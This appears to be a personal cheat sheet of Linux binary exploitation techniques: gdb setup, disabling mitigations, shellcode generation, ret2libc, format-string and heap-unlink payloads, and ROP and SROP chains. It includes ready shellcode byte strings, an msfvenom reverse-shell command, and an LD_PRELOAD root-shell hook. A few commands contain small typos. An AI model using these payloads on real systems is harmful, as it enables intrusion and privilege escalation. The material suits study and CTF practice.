Last changed: 31.07.2020

linux exploitation

show imports

ldd my_binary
nm -D my_binary
readelf -d my_binary

locate buffer overflow

ltrace -i ./my_binary `python -c 'python -c 'from pwn import *; g=cyclic_gen(string.ascii_lowercase); print(g.get(100))'`

setup gdb extensions

clone peda and gef

git clone https://github.com/longld/peda.git ~/src/peda
git clone https://github.com/hugsy/gef.git -b master ~/src/gef

.gdbinit

define init-peda
source ~/src/peda/peda.py
end
define init-gef
source ~/src/gef/gef.py
end

/usr/bin/gdb-peda

#!/bin/sh
exec gdb -q -ex init-peda "$@"

/usr/bin/gdb-gef

#!/bin/sh
exec gdb -q -ex init-gef "$@"

pwntools

>>> from pwn import *
>>> p = process(['./binary'])
>>> p = remote('10.0.0.1', 1234)
>>> p.send(p32(0xdeadbeef))
>>> leak = u32(p.recv())
>>> p.interactive()

remote gdb debugging

>>> p = process(['gdbserver', 'localhost:1234', './binary'])

stripped binaries

To find the entry point of stripped PIE binaries you can set an initial break point or read the file info

(gdb) starti
(gdb) info files
(gdb) info functions

Another method is to look at imported functions and use ltrace

objdump -R my_binary
ltrace my_binary 2>$1 | grep main

source files

If you have the correspondig source code and compiled the binary with debug information gdb can inspect the source code.

(gdb) list
(gdb) br <filename>:<linenumber>
(gdb) info source
(gdb) info functions <search_regex>
(gdb) info line *<address>

advanced gdb features

environment variables

show env
set env test = ABC
unset env test

modify values

set $eax=1
set {int}$esp=1337
set {char [4]}0xbffffb08="ABC"

signals

info signals
handle SIGSEGV pass nostop

libraries

You can set gdb to break on library load

show stop-on-solib-events
set stop-on-solib-events 1

disable ALSR, PIE, NX, Canaries, RELRO and compiler optimization

To practice or analyze simple exploits it can help to deactivate some mitigations. In linux this can be done with the following commands.

echo 0 > /proc/sys/kernel/randomize_va_space
gcc -o test test.c -no-pie -zexecstack -fno-stack-protector -znorelro -O0

overload imported functions

#include <stdlib.h>
void usleep() {
  unsetenv("LD_PRELOAD");
  system("/bin/bash -p");
  exit(0);
}

Compile the file as a shared object and load it with LD_PRELOAD.

gcc -fpic -shared -o lib.so lib.c
LD_PRELOAD=/path/to/lib.sh my_binary

determine buffer length

metasploit

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb 300
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 0x396a4138

peda

gdb-peda$ pattern_create 300
gdb-peda$ pattern_offset 0x41416d41

send binary data to program input

To send your exploit to a vulnerable binary you can use a scripting language like python or perl. To keep the pipe open after your payload you can use cat.

(perl -e 'print("A"x1234, "\xef\xbe\xad\xde", <SHELLCODE>, "\n")'; cat) | ./vuln_app
(python2 -c 'print("A"*1234 + "\xef\xbe\xad\xde" + <SHELLCODE>)'; cat) | ./vuln_app
(python3 -c 'import sys;sys.stdout.buffer.write(b"A"*1234 + b"\xef\xbe\xad\xde" + <SHELLCODE> + "\n")'; cat) | ./vuln_app

shellcode generation

Good resources for already assembled shellcode are shell-storm.org and exploit-db.com. You can search the local exploit-db.

searchsploit "Linux/ARM"
grep "Linux/ARM" /usr/share/exploitdb/files_shellcodes.csv

Infos on opcodes and linux syscalls can be found on sparksandflames.com, github.com/corkami and syscalls.kernelgrok.com.

shell.s

BITS 32
xor    eax,eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
push   eax
push   ebx
mov    ecx,esp
mov    al,0xb
int    0x80

Assemble the file and print the opcode string

nasm shell.s -o shell
xxd -p shell

setreuid_shell.s

Some programs (e.g. bash) drop their priviliges to the real uid before executing. In this case you can use shellcode that sets the RUID to the EUID.

BITS 32
push 0x31
pop eax
cdq
int 0x80
mov ebx, eax
mov ecx, eax
push 0x46
pop eax
int 0x80
mov al, 0xb
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
mov ecx, edx
int 0x80

This results in a 34 byte shellcode.

echo 6a315899cd8089c389c16a4658cd80b00b52686e2f7368682f2f626989e389d1cd80 | sed 's/.\{2\}/\\x&/g'
\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80

radare2

With radare2 you can do this in one step

rasm2 -a x86 -b 32 "xor eax,eax; xor edx,edx; push eax; push 0x68732f2f; push 0x6e69622f; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0xb; int 0x80"

To use the hexstring in a script you can insert escape sequences.

echo 31c031d250682f2f7368682f62696e89e3505389e1b00bcd80 | sed 's/.\{2\}/\\x&/g'
\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

metasploit

Alternatively you can generate shellcode with metasploit

msfvenom -l payloads
msfvenom -p linux/x86/shell_reverse_tcp --list-options
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 -b "\x00\x0a" -f c

To test the generated shellcode you can use the following program

shellcode_test.c

#include <stdlib.h>

char sc[] = "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

void main(){
    void (*f)(void);
    f = (void *)sc;
    f();
}

compile the above with

gcc -m32 -z execstack -o shellcode_test shellcode_test.c

cat shellcode

Sometimes an interactive shell is not the best choice for your payload. If you just want to read a specific file on the target you could generate a shellcode which executes cat <FILE>. I wrote a small script that generates such shellcode.

modify precompiled shellcode

To disassemble and patch shellcode you can use the Online Assembler and Disassembler on shell-storm.org or do it with radare2

rasm2 -b 64 -d `echo "\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x80\xb8\x00\x00\x00\x48\x89\xc1\x48\x8b\x80\xe8\x02\x00\x00\x48\x2d\xe8\x02\x00\x00\x4c\x8b\x88\xe0\x02\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x58\x03\x00\x00\x48\x89\x91\x58\x03\x00\x00\xc3" | tr -d '\\\\x'` | tr '\n' ';'
rasm2 -b 64 "mov rax, qword gs:[0x188];mov rax, qword [rax + 0xb8];mov rcx, rax;mov rax, qword [rax + 0x2f0];sub rax, 0x2f0;mov r9, qword [rax + 0x2e8];cmp r9, 4;jne 0x13;mov rdx, qword [rax + 0x360];mov qword [rcx + 0x360], rdx;ret;" | sed 's/.\{2\}/\\x&/g'

trampolines

If randomization is in use you could try to find something like jmp rsp in a loaded library which is loaded at a fixed address. Then overwrite the return address with such a trampoline followed by your shellcode.

find base addresses

cat /proc/<pid>/maps | grep libc
(gdb) info proc mappings
gdb-peda$ vmmap

search instructions

objdump -D /usr/lib/libc.so.6 -M intel | grep -e'jmp *rsp'
ropper -f /usr/lib/libc.so.6 -I 0xBA5E0000 --instructions 'jmp rax'
gdb-peda$ jmpcall esp libc

nasm shell

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 64
nasm > jmp rsp
00000000  FFE4              jmp rsp

rasm2

rasm2 -a arm -b 16 'bx sp'
6847
rasm2 -a arm -b 16 -d 6847
bx sp

search opcode with ropper

ropper -f arm_libc.so.6 -I 0xBA5E0000 --opcode 6?47

return2libc (32bit)

If the base address of the libc is fixed and if you find everything you need in its address space you can write a return2libc exploit.

find function addresses

gdb-peda$ x/wx system
0xb7e67310 <system>:    0x08ec8353
gdb-peda$ x/wx exit
0xb7e5a260 <exit>:      0x5a55e853

search strings with gdb

Then you lookup the string /bin/sh which is included in the libc.

(gdb) br __libc_start_main
(gdb) run
(gdb) info sharedlibrary
(gdb) find &system,+9999999,"/bin/sh"

search strings with peda

gdb-peda$ searchmem "/bin/sh" libc

search string with gef

gef> search-pattern "/bin/sh"

exploit

Last you overwrite the return address with <SYSTEM ADDR><EXIT ADDR></BIN/SH ADDR>

./binary `python2 -c 'print("A"*32 + "\x10\x73\xe6\xb7" + "\x60\xa2\xe5\xb7" + "\x4c\x9d\xf8\xb7")'`

return to dl-resolve

In binaries without Full Relocation Read-Only it can be possible to create the needed parameters and call _dl_runtime_resolve on any chosen function in the loaded libraries.

get needed addresses

objdump -x my_binary | grep -e STRTAB -e SYMTAB -e JMPREL
gef> maintenance info sections
gef> got

buffer layout

             --------------
<buffer>    | fake EBP      |   for leave instruction
            | PLT[0]        |   push link_map; jmp _dl_runtime_resolve
            | rel_offset    |   <buffer + X> - JMPREL
            | fake RET      |   after function call
            | function args |
            | ...           |
<buffer +X> | r_offset      |   some GOT address for resolved address
            | r_info        |   (<buffer + Y> - SYMTAB) << 4 | 0x7
            | ...           |   padding till (st_name - SYMTAB) % 0x10 ==0
<buffer +Y> | st_name       |   <buffer + Z> - STRTAB
            | st_value      |   0x0 (irrelevant)
            | st_size       |   0x0 (irrelevant)
            | st_info       |   0x0 (value | 0x3 == 0)
<buffer +Z> | sym_string    |   function name (e.g. "execve\0")
            | ...           |

execution

To get your function resolved you could try to transfer the stack pointer to your buffer with a leave; return gadget.

There should be enough writable space above the buffer for the following stack frames of _dl_runtime_resolve.

A detailed writeup of this method can be found on github.

OneGadget

With the tool one_gadget you can search for a single gadget which will execute "/bin/sh".

one_gadget --base <BASE_ADDRESS> libc.so.6

return oriented programming

search gadgets

ropper -f my_library --nocolor > rop_gadgets.txt

ropper can search for gadgets in binaries. ? stands for any character and % for any string.

ropper -f my_library -I <base> --search 'pop e?x; pop e?x'
ropper -f my_library -I <base> --search 'mov [???], eax'
ropper -f my_library -I <base> --search 'mov [e%], eax'

generate full chain

ropper -f my_library --chain "execve cmd=/bin/sh" --badbytes 000a

find statically mapped libraries

ltrace ./my_binary 2>&1 | grep -e mmap -e open

format string exploits

In most calling conventions some or all parameters are passed on the stack. In 64bit linux the arguments are passed in RDI RSI RDX RCX R8 R9. Additional arguments are passed on the stack. In Windows 64bit its RCX RDX R8 R9 and the rest on the stack.

Depending on the format string vulnerability the content of these registers and the stack can be read or used to modify memory.

read data

First you have to find out at which parameter position your string is placed.

AAAA%08x08x08x08x08x%08x08x08x08x08x

Then you send the address you want to read and the found parameter position.

\xef\xbe\xad\xde%7$s

write data

To write data you can use the %n placeholder to write 4 bytes, %hn for 2 bytes and %hhn to write a single byte. You will write the number of written bytes to the referenced address. The number of written bytes can be modified with the width field.

To write the value 0x1337 to the address 0xdeadbeef use

\xef\xbe\xad\xde%4915x%7$n
\xef\xbe\xad\xde%4915x%7$hn
\xef\xbe\xad\xde\xf0\xbe\xad\xde%11x%8$hhn%36x%7$hhn

finding write locations

If you do not know the location of the return address you could try writing to the .fini-array, the .dtors or the .got.plt. If none of this works you could look if you can overwrite the address of .fini in the .dynamic section.

readelf -S binary | grep -e got -e dtors -e fini -e dynamic
(gdb) maintenance info sections
gef> got

If you can only write a single byte you could try to overwrite the got entry of a function which is not yet resolved with the plt entry address of another function (e.g. system).

pwntools

def send_fmt(s):
    p.sendline(s)
    d = recvuntil(prompt)
    return d[:-len(prompt)]
fmt = FmtStr(execute_fmt=send_fmt, offset = str_offset)
fmt.write(target, value)
fmt.execute_writes()

libformatstr

The python module libformatstr can also help writing format string exploits.

heap overflows

heap chunks

              used chunk          free chunk
             --------------      --------------
            | prev_size    |    | prev_size    |
            | size + flags |    | size + flags |
pointer ->  | data         |    | FD pointer   |
            | ...          |    | BK pointer   |
             --------------      --------------

The flags are 3 bits. The LSB is the PREV_INUSE flag.

As prev_size is only needed if the previous chunk is free it can be used for data by a previous chunk which is in use.

You can analyse the heap with gef

gef> heap bins
gef> heap chunks

memory allocator hooks

The libc offers writable memory to put in hooking functions for debugging the memory allocation process.

(gdb) info address __malloc_hook
(gdb) info address __realloc_hook
(gdb) info address __free_hook
(gdb) info address __memalign_hook

These functions get called if the corresponding memory allocation is done. Therefore they represent perfect targets to gain code execution.

Even if malloc is not directly called by the vulnerable binary you can sometimes trigger it (eg. by calling printf(<64k string>)).

dlmalloc (without safe unlinking)

Prerequisites are a chunk with a buffer overflow vulnerability into another chunk which will be freed afterwards by the program.

By overwriting the chunks metadata we can insert fake chunks to enforce coalescence and unlinking.

#define unlink(P, BK, FD){
    FD = P->fd; /* chunk +8 */
    BK = P->bk; /* chunk +12 */
    FD->bk = BK;
    BK->fd = FD;
}

Negative values are used for the sizes to avoid zero bytes. Therefore the "next" chunk is located in memory before the "previous" chunk.

  fake_after_next         fake_next               freed chunk
 --------------------    --------------------    --------------------
| "AAAA"             |  | "AAAA"             |  | "AAAA"             |
| PREV_INUSE not set |  | "\xf9\xff\xff\xff" |  | "\xf1\xff\xff\xff" |
 --------------------   | <target_addr -12>  |   --------------------
                        | <shellcode_addr>   |
                         --------------------

To determine the need for coalescence its own PREV_INUSE flag and the one of the chunk after the next are checked. As that one is not set the next chunk has to be unlinked.

The shellcode should begin with a short jump over some unused bytes as the target_addr will be written into this space by unlink().

This is an example the distance between the two chunks is 0xa0 and the value at 0x080496cc gets overwritten with the shellcode address 0x0804a008.

python2 -c 'sc="\xeb\x0e"+"A"*14+"\xcc"; print(sc+"A"*(0xa0-8-len(sc)-5*4)+"\x02"+"A"*7+"\xf9\xff\xff\xff"+"\xb8\x96\x04\x08"+"\x08\xa0\x04\x08"+"A"*4+"\xf1\xff\xff\xff")'

leaking heap bin addresses

If a chunk from a heap bin is not overwritten it can be possible to optain the values of its FD or BK pointers. This can be interesting if they point to the list head e.g. in the main arena of libc.

tcache poisoning

The Tcache is another fast heap bin which can hold up to 7 singly linked free chunks for each size.

By overwriting the FD pointer of a chunk in the Tcache you could trick malloc into returning any arbitrary memory location if another chunk is requested from after the corrupted one.

Sigreturn Oriented Programming

An interesting alternative method for execution flow control is Sigreturn Oriented Programming (SROP).

By calling the sigreturn syscall (0xf) the kernel will try to read a signal frame from the current stack position and will update the cpu context accordingly.

from pwn import *
context.clear(arch="amd64")
frame = SigreturnFrame(kernel="amd64")
frame.rax = 59                          # execve
frame.rdi = ptr_command
frame.rsi = 0
frame.rdx = 0

Multiple frames can be chained with a syscall; retn; gadget.

debugging other architectures

run in qemu

qemu-mips -noaslr -g 1234 ./mips_binary

connect with gdb-multiarch

gdb-multiarch
set endian big
set architecture mips
target remote localhost:1234